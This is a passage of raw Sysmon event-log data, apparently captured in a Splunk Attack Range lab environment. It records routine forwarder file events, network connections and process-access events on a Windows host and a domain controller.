23542300x8000000000000000807686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:04.759{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86C323A48D0788A52B9FB7D7BFA33E1E,SHA256=4FD94FC7567F9287AA8EA7D862E72C5F376C9991572992C5067A729E12790CE7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:02.204{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57273-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001049126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.720{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51035-false10.0.1.12-8000- 23542300x80000000000000001049129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:05.373{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71AA9677E957BB53E5C9BBC372EBF67D,SHA256=EE68D186A4046C6DDF6C22D6E1F902F0A2C7C5FE9C447F3D4B86E89B51A239D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:03.890{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57274-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000807689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:03.600{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-49836-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001049128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:57.283{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57274-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001049135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:06.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78F33FE4BA292FC772A7EA3460F3B784,SHA256=C4465E553FC7AEABF968A893E1394EC89C7D5BDB23C819B6D095E7170C68DCB0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:06.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:06.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:06.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:06.025{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D088504023B5AEB27964E026D22A2416,SHA256=FD1E6D2E15937612CC8C983A6F14748445021F4CC560EBA5066A5D2A50068D6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:06.272{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:06.241{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53E5-60E8-EE0F-00000000CF01}2816C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001049132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:06.241{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53E5-60E8-EE0F-00000000CF01}2816C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001049131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:53:06.237{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.2816.381.91652823C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001049130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:53:06.237{466BC892-53E5-60E8-EE0F-00000000CF01}2816\chrome.2816.381.91652823C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000807695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:07.056{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFA6BB03B60E3D352B520796585812AB,SHA256=BAF4C3A747A6A9AE81F2EEAFD15FED1093A61B22DF7D5E9B71BE25FB9A9B184B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 